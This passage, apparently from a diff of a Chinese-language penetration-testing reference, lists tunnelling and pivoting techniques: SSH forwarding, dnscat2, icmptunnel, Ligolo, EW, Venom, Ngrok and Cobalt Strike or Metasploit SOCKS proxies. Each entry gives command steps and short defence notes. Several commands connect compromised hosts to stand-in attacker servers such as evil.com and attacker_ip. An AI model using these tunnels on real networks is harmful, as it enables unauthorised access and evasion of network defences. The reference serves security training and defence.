|
|
156
|
+
|
|
157
|
+
**配置代理**
|
|
158
|
+
> 通过代理扫描
|
|
159
|
+
_platform: linux_
|
|
160
|
+
```
|
|
161
|
+
proxychains nmap -sT -Pn target
|
|
162
|
+
```
|
|
163
|
+
|
|
164
|
+
|
|
165
|
+
**概述:** ReGeorg通过Web Shell建立SOCKS代理隧道。
|
|
166
|
+
|
|
167
|
+
**漏洞原理:** Web服务器可上传执行脚本。
|
|
168
|
+
|
|
169
|
+
**利用方法:** 利用流程:1) 上传隧道脚本 2) 建立隧道 3) 通过代理访问
|
|
170
|
+
|
|
171
|
+
**防御措施:** 防御措施:1) 限制文件上传 2) 监控异常请求
|
|
172
|
+
|
|
173
|
+
---
|
|
174
|
+
|
|
175
|
+
### SSH本地转发 `tunnel-ssh-local`
|
|
176
|
+
_SSH本地端口转发_
|
|
177
|
+
子类:**SSH** · tags: `ssh` `tunnel` `local`
|
|
178
|
+
|
|
179
|
+
**前置条件:**
|
|
180
|
+
- SSH访问权限
|
|
181
|
+
|
|
182
|
+
**攻击链:**
|
|
183
|
+
|
|
184
|
+
**本地转发**
|
|
185
|
+
> 将目标80端口映射到本地8080
|
|
186
|
+
_platform: linux_
|
|
187
|
+
```
|
|
188
|
+
ssh -L 8080:target:80 user@jump
|
|
189
|
+
```
|
|
190
|
+
**语法解析:**
|
|
191
|
+
- `-L 8080:target:80` — 本地转发:本地8080->target:80 _parameter_
|
|
192
|
+
- `user@jump` — SSH跳板机 _value_
|
|
193
|
+
|
|
194
|
+
|
|
195
|
+
**概述:** SSH本地转发可以将远程端口映射到本地。
|
|
196
|
+
|
|
197
|
+
**漏洞原理:** SSH访问可以建立隧道。
|
|
198
|
+
|
|
199
|
+
**利用方法:** 利用流程:1) 建立SSH连接 2) 配置转发 3) 访问本地端口
|
|
200
|
+
|
|
201
|
+
**防御措施:** 防御措施:1) 限制SSH端口转发 2) 监控SSH连接
|
|
202
|
+
|
|
203
|
+
---
|
|
204
|
+
|
|
205
|
+
### SSH远程转发 `tunnel-ssh-remote`
|
|
206
|
+
_SSH远程端口转发_
|
|
207
|
+
子类:**SSH** · tags: `ssh` `tunnel` `remote`
|
|
208
|
+
|
|
209
|
+
**前置条件:**
|
|
210
|
+
- SSH访问权限
|
|
211
|
+
|
|
212
|
+
**攻击链:**
|
|
213
|
+
|
|
214
|
+
**远程转发**
|
|
215
|
+
> 将本地80端口映射到远程8080
|
|
216
|
+
_platform: linux_
|
|
217
|
+
```
|
|
218
|
+
ssh -R 8080:localhost:80 user@jump
|
|
219
|
+
```
|
|
220
|
+
**语法解析:**
|
|
221
|
+
- `-R 8080:localhost:80` — 远程转发:远程8080->本地80 _parameter_
|
|
222
|
+
- `user@jump` — SSH跳板机 _value_
|
|
223
|
+
|
|
224
|
+
|
|
225
|
+
**概述:** SSH远程转发可以将本地端口暴露到远程。
|
|
226
|
+
|
|
227
|
+
**漏洞原理:** SSH访问可以建立反向隧道。
|
|
228
|
+
|
|
229
|
+
**利用方法:** 利用流程:1) 建立SSH连接 2) 配置反向转发 3) 从远程访问
|
|
230
|
+
|
|
231
|
+
**防御措施:** 防御措施:1) 限制SSH端口转发 2) GatewayPorts no
|
|
232
|
+
|
|
233
|
+
---
|
|
234
|
+
|
|
235
|
+
### SSH动态转发 `tunnel-ssh-dynamic`
|
|
236
|
+
_SSH动态SOCKS代理_
|
|
237
|
+
子类:**SSH** · tags: `ssh` `tunnel` `socks`
|
|
238
|
+
|
|
239
|
+
**前置条件:**
|
|
240
|
+
- SSH访问权限
|
|
241
|
+
|
|
242
|
+
**攻击链:**
|
|
243
|
+
|
|
244
|
+
**动态转发**
|
|
245
|
+
> 创建SOCKS代理
|
|
246
|
+
_platform: linux_
|
|
247
|
+
```
|
|
248
|
+
ssh -D 1080 user@jump
|
|
249
|
+
```
|
|
250
|
+
**语法解析:**
|
|
251
|
+
- `-D 1080` — 动态转发,创建SOCKS5代理 _parameter_
|
|
252
|
+
- `user@jump` — SSH跳板机 _value_
|
|
253
|
+
|
|
254
|
+
**使用代理**
|
|
255
|
+
> 通过SOCKS代理访问
|
|
256
|
+
_platform: linux_
|
|
257
|
+
```
|
|
258
|
+
proxychains nmap -sT -Pn target
|
|
259
|
+
```
|
|
260
|
+
|
|
261
|
+
|
|
262
|
+
**概述:** SSH动态转发创建SOCKS代理,可访问任意目标。
|
|
263
|
+
|
|
264
|
+
**漏洞原理:** SSH访问可以建立SOCKS代理。
|
|
265
|
+
|
|
266
|
+
**利用方法:** 利用流程:1) 建立SSH连接 2) 创建SOCKS代理 3) 通过代理访问
|
|
267
|
+
|
|
268
|
+
**防御措施:** 防御措施:1) 限制SSH端口转发 2) 监控SSH连接
|
|
269
|
+
|
|
270
|
+
---
|
|
271
|
+
|
|
272
|
+
### DNS隧道 `tunnel-dns`
|
|
273
|
+
_通过DNS协议建立隧道_
|
|
274
|
+
子类:**DNS** · tags: `dns` `tunnel` `covert`
|
|
275
|
+
|
|
276
|
+
**前置条件:**
|
|
277
|
+
- DNS解析权限
|
|
278
|
+
- 可控域名
|
|
279
|
+
|
|
280
|
+
**攻击链:**
|
|
281
|
+
|
|
282
|
+
**使用dnscat2**
|
|
283
|
+
> 启动dnscat2服务器
|
|
284
|
+
_platform: linux_
|
|
285
|
+
```
|
|
286
|
+
ruby dnscat2.rb evil.com --dns port=53,domain=evil.com
|
|
287
|
+
```
|
|
288
|
+
|
|
289
|
+
**客户端连接**
|
|
290
|
+
> 客户端连接到服务器
|
|
291
|
+
_platform: windows_
|
|
292
|
+
```
|
|
293
|
+
dnscat2-v0.07-client-win32.exe --dns domain=evil.com --secret SECRET
|
|
294
|
+
```
|
|
295
|
+
|
|
296
|
+
**建立隧道**
|
|
297
|
+
> 建立SOCKS隧道
|
|
298
|
+
_platform: linux_
|
|
299
|
+
```
|
|
300
|
+
session -i 1
|
|
301
|
+
listen 127.0.0.1:1080 10.0.0.1:1080
|
|
302
|
+
```
|
|
303
|
+
|
|
304
|
+
|
|
305
|
+
**概述:** DNS隧道利用DNS协议传输数据,绕过防火墙。
|
|
306
|
+
|
|
307
|
+
**漏洞原理:** DNS通常被允许通过防火墙。
|
|
308
|
+
|
|
309
|
+
**利用方法:** 利用流程:1) 配置域名 2) 启动服务器 3) 客户端连接
|
|
310
|
+
|
|
311
|
+
**防御措施:** 防御措施:1) 限制DNS查询 2) 监控异常DNS流量
|
|
312
|
+
|
|
313
|
+
---
|
|
314
|
+
|
|
315
|
+
### ICMP隧道 `tunnel-icmp`
|
|
316
|
+
_通过ICMP协议建立隧道_
|
|
317
|
+
子类:**ICMP** · tags: `icmp` `tunnel` `covert`
|
|
318
|
+
|
|
319
|
+
**前置条件:**
|
|
320
|
+
- ICMP允许通过
|
|
321
|
+
- 管理员权限
|
|
322
|
+
|
|
323
|
+
**攻击链:**
|
|
324
|
+
|
|
325
|
+
**使用icmptunnel**
|
|
326
|
+
> 服务端启动
|
|
327
|
+
_platform: linux_
|
|
328
|
+
```
|
|
329
|
+
icmptunnel -s 10.0.0.1
|
|
330
|
+
```
|
|
331
|
+
|
|
332
|
+
**客户端连接**
|
|
333
|
+
> 客户端连接
|
|
334
|
+
_platform: linux_
|
|
335
|
+
```
|
|
336
|
+
icmptunnel -c attacker.com
|
|
337
|
+
```
|
|
338
|
+
|
|
339
|
+
|
|
340
|
+
**概述:** ICMP隧道利用ICMP Echo包传输数据。
|
|
341
|
+
|
|
342
|
+
**漏洞原理:** ICMP通常被允许通过防火墙。
|
|
343
|
+
|
|
344
|
+
**利用方法:** 利用流程:1) 启动服务端 2) 客户端连接 3) 建立隧道
|
|
345
|
+
|
|
346
|
+
**防御措施:** 防御措施:1) 限制ICMP 2) 监控异常ICMP流量
|
|
347
|
+
|
|
348
|
+
---
|
|
349
|
+
|
|
350
|
+
### Ligolo隧道 `tunnel-ligolo`
|
|
351
|
+
_Ligolo内网穿透工具_
|
|
352
|
+
子类:**Ligolo** · tags: `ligolo` `tunnel` `proxy`
|
|
353
|
+
|
|
354
|
+
**前置条件:**
|
|
355
|
+
- 可执行代理程序
|
|
356
|
+
|
|
357
|
+
**攻击链:**
|
|
358
|
+
|
|
359
|
+
**启动服务端**
|
|
360
|
+
> 启动Ligolo代理服务
|
|
361
|
+
_platform: linux_
|
|
362
|
+
```
|
|
363
|
+
sudo proxy -selfcert
|
|
364
|
+
```
|
|
365
|
+
|
|
366
|
+
**运行代理**
|
|
367
|
+
> 目标机器运行代理
|
|
368
|
+
_platform: windows_
|
|
369
|
+
```
|
|
370
|
+
agent.exe -connect attacker:11601 -ignore-cert
|
|
371
|
+
```
|
|
372
|
+
|
|
373
|
+
**创建隧道**
|
|
374
|
+
> 创建隧道接口
|
|
375
|
+
_platform: linux_
|
|
376
|
+
```
|
|
377
|
+
session
|
|
378
|
+
start
|
|
379
|
+
```
|
|
380
|
+
|
|
381
|
+
|
|
382
|
+
**概述:** Ligolo是现代化的内网穿透工具,支持多平台。
|
|
383
|
+
|
|
384
|
+
**漏洞原理:** 可以在目标机器运行代理程序。
|
|
385
|
+
|
|
386
|
+
**利用方法:** 利用流程:1) 启动服务端 2) 运行代理 3) 创建隧道
|
|
387
|
+
|
|
388
|
+
**防御措施:** 防御措施:1) 监控异常进程 2) 限制出站连接
|
|
389
|
+
|
|
390
|
+
---
|
|
391
|
+
|
|
392
|
+
### SOCKS代理 `socks-proxy`
|
|
393
|
+
_建立SOCKS代理访问内网_
|
|
394
|
+
子类:**SOCKS** · tags: `socks` `proxy` `tunnel`
|
|
395
|
+
|
|
396
|
+
**前置条件:**
|
|
397
|
+
- 已有内网访问点
|
|
398
|
+
|
|
399
|
+
**攻击链:**
|
|
400
|
+
|
|
401
|
+
**SSH SOCKS代理**
|
|
402
|
+
> SSH动态端口转发
|
|
403
|
+
_platform: linux_
|
|
404
|
+
```
|
|
405
|
+
ssh -D 1080 user@jumpserver
|
|
406
|
+
或
|
|
407
|
+
ssh -D 1080 -N -f user@jumpserver
|
|
408
|
+
```
|
|
409
|
+
**语法解析:**
|
|
410
|
+
- `-D 1080` — 本地SOCKS代理端口 _parameter_
|
|
411
|
+
- `-N` — 不执行远程命令 _parameter_
|
|
412
|
+
- `-f` — 后台运行 _parameter_
|
|
413
|
+
|
|
414
|
+
**ProxyChains配置**
|
|
415
|
+
> 配置ProxyChains
|
|
416
|
+
_platform: linux_
|
|
417
|
+
```
|
|
418
|
+
编辑 /etc/proxychains.conf:
|
|
419
|
+
[ProxyList]
|
|
420
|
+
socks5 127.0.0.1 1080
|
|
421
|
+
|
|
422
|
+
使用:
|
|
423
|
+
proxychains nmap -sT target
|
|
424
|
+
```
|
|
425
|
+
|
|
426
|
+
**Cobalt Strike SOCKS**
|
|
427
|
+
> CS SOCKS代理
|
|
428
|
+
_platform: windows_
|
|
429
|
+
```
|
|
430
|
+
beacon> socks 1080
|
|
431
|
+
在CS中启动SOCKS代理
|
|
432
|
+
```
|
|
433
|
+
|
|
434
|
+
**Metasploit SOCKS**
|
|
435
|
+
> MSF SOCKS代理
|
|
436
|
+
_platform: linux_
|
|
437
|
+
```
|
|
438
|
+
use auxiliary/server/socks_proxy
|
|
439
|
+
set SRVPORT 1080
|
|
440
|
+
set VERSION 4a
|
|
441
|
+
run
|
|
442
|
+
```
|
|
443
|
+
|
|
444
|
+
|
|
445
|
+
**概述:** SOCKS代理可穿透内网访问更多资源。
|
|
446
|
+
|
|
447
|
+
**漏洞原理:** 存在可访问的内网入口点。
|
|
448
|
+
|
|
449
|
+
**利用方法:** 利用流程:1) 获取跳板机 2) 建立SOCKS代理 3) 访问内网
|
|
450
|
+
|
|
451
|
+
**防御措施:** 防御措施:1) 网络隔离 2) 监控异常连接 3) 限制出站流量
|
|
452
|
+
|
|
453
|
+
---
|
|
454
|
+
|
|
455
|
+
### Ngrok内网穿透 `tunnel-ngrok`
|
|
456
|
+
_使用Ngrok建立内网穿透_
|
|
457
|
+
子类:**Ngrok** · tags: `ngrok` `tunnel` `penetration`
|
|
458
|
+
|
|
459
|
+
**前置条件:**
|
|
460
|
+
- Ngrok账号
|
|
461
|
+
- 可访问外网
|
|
462
|
+
|
|
463
|
+
**攻击链:**
|
|
464
|
+
|
|
465
|
+
**安装Ngrok**
|
|
466
|
+
> 安装并配置Ngrok
|
|
467
|
+
```
|
|
468
|
+
下载: https://ngrok.com/download
|
|
469
|
+
tar -xvzf ngrok.zip
|
|
470
|
+
./ngrok authtoken YOUR_TOKEN
|
|
471
|
+
```
|
|
472
|
+
|
|
473
|
+
**HTTP隧道**
|
|
474
|
+
> 创建HTTP隧道
|
|
475
|
+
```
|
|
476
|
+
./ngrok http 80
|
|
477
|
+
将本地80端口映射到公网
|
|
478
|
+
```
|
|
479
|
+
|
|
480
|
+
**TCP隧道**
|
|
481
|
+
> 创建TCP隧道
|
|
482
|
+
```
|
|
483
|
+
./ngrok tcp 3389
|
|
484
|
+
将本地3389端口映射到公网
|
|
485
|
+
```
|
|
486
|
+
**语法解析:**
|
|
487
|
+
- `http` — HTTP协议隧道 _keyword_
|
|
488
|
+
- `tcp` — TCP协议隧道 _keyword_
|
|
489
|
+
|
|
490
|
+
**自定义域名**
|
|
491
|
+
> 使用自定义域名
|
|
492
|
+
```
|
|
493
|
+
./ngrok http -hostname=custom.domain.com 80
|
|
494
|
+
```
|
|
495
|
+
|
|
496
|
+
|
|
497
|
+
**概述:** Ngrok可将内网服务暴露到公网。
|
|
498
|
+
|
|
499
|
+
**漏洞原理:** 内网可访问外网。
|
|
500
|
+
|
|
501
|
+
**利用方法:** 利用流程:1) 安装Ngrok 2) 创建隧道 3) 访问内网服务
|
|
502
|
+
|
|
503
|
+
**防御措施:** 防御措施:1) 监控出站连接 2) 限制Ngrok域名 3) 网络隔离
|
|
504
|
+
|
|
505
|
+
---
|
|
506
|
+
|
|
507
|
+
### EW内网穿透 `tunnel-ew`
|
|
508
|
+
_使用EW建立内网穿透_
|
|
509
|
+
子类:**EW** · tags: `ew` `tunnel` `socks`
|
|
510
|
+
|
|
511
|
+
**前置条件:**
|
|
512
|
+
- 已有内网访问点
|
|
513
|
+
|
|
514
|
+
**攻击链:**
|
|
515
|
+
|
|
516
|
+
**正向代理**
|
|
517
|
+
> 正向SOCKS代理
|
|
518
|
+
_platform: linux_
|
|
519
|
+
```
|
|
520
|
+
./ew -s ssocksd -l 1080
|
|
521
|
+
在跳板机上启动SOCKS代理
|
|
522
|
+
```
|
|
523
|
+
**语法解析:**
|
|
524
|
+
- `-s ssocksd` — SOCKS服务模式 _parameter_
|
|
525
|
+
- `-l 1080` — 监听端口 _parameter_
|
|
526
|
+
|
|
527
|
+
**反向代理**
|
|
528
|
+
> 反向SOCKS代理
|
|
529
|
+
_platform: linux_
|
|
530
|
+
```
|
|
531
|
+
攻击机: ./ew -s rcsocks -l 1080 -e 8888
|
|
532
|
+
跳板机: ./ew -s rssocks -d attacker_ip -e 8888
|
|
533
|
+
```
|
|
534
|
+
|
|
535
|
+
**多级级联**
|
|
536
|
+
> 多级级联
|
|
537
|
+
_platform: linux_
|
|
538
|
+
```
|
|
539
|
+
./ew -s lcx_tran -l 1080 -f 2nd_hop -g 9999
|
|
540
|
+
多级跳板穿透
|
|
541
|
+
```
|
|
542
|
+
|
|
543
|
+
|
|
544
|
+
**概述:** EW是轻量级的内网穿透工具。
|
|
545
|
+
|
|
546
|
+
**漏洞原理:** 存在可访问的内网跳板。
|
|
547
|
+
|
|
548
|
+
**利用方法:** 利用流程:1) 上传EW 2) 建立隧道 3) 访问内网
|
|
549
|
+
|
|
550
|
+
**防御措施:** 防御措施:1) 监控异常进程 2) 网络隔离 3) 限制出站
|
|
551
|
+
|
|
552
|
+
---
|
|
553
|
+
|
|
554
|
+
### Venom内网穿透 `tunnel-venom`
|
|
555
|
+
_使用Venom建立内网穿透_
|
|
556
|
+
子类:**Venom** · tags: `venom` `tunnel` `socks`
|
|
557
|
+
|
|
558
|
+
**前置条件:**
|
|
559
|
+
- 已有内网访问点
|
|
560
|
+
|
|
561
|
+
**攻击链:**
|
|
562
|
+
|
|
563
|
+
**启动服务端**
|
|
564
|
+
> 启动服务端
|
|
565
|
+
_platform: linux_
|
|
566
|
+
```
|
|
567
|
+
./venom_server -lport 9999
|
|
568
|
+
在攻击机启动服务端
|
|
569
|
+
```
|
|
570
|
+
|
|
571
|
+
**连接客户端**
|
|
572
|
+
> 连接服务端
|
|
573
|
+
```
|
|
574
|
+
./venom_client -rhost attacker_ip -rport 9999
|
|
575
|
+
在跳板机连接服务端
|
|
576
|
+
```
|
|
577
|
+
**语法解析:**
|
|
578
|
+
- `-rhost` — 服务端IP _parameter_
|
|
579
|
+
- `-rport` — 服务端端口 _parameter_
|
|
580
|
+
|
|
581
|
+
**建立SOCKS**
|
|
582
|
+
> 建立SOCKS代理
|
|
583
|
+
```
|
|
584
|
+
Venom > socks 1080
|
|
585
|
+
建立SOCKS代理
|
|
586
|
+
```
|
|
587
|
+
|
|
588
|
+
**端口转发**
|
|
589
|
+
> 端口转发
|
|
590
|
+
```
|
|
591
|
+
Venom > lforward 127.0.0.1 3389 13389
|
|
592
|
+
将内网3389转发到本地13389
|
|
593
|
+
```
|
|
594
|
+
|
|
595
|
+
|
|
596
|
+
**概述:** Venom支持多级代理和SOCKS。
|
|
597
|
+
|
|
598
|
+
**漏洞原理:** 存在可访问的内网跳板。
|
|
599
|
+
|
|
600
|
+
**利用方法:** 利用流程:1) 启动服务端 2) 连接客户端 3) 建立代理
|
|
601
|
+
|
|
602
|
+
**防御措施:** 防御措施:1) 监控异常进程 2) 网络隔离 3) 限制出站
|
|
603
|
+
|
|
604
|
+
---
|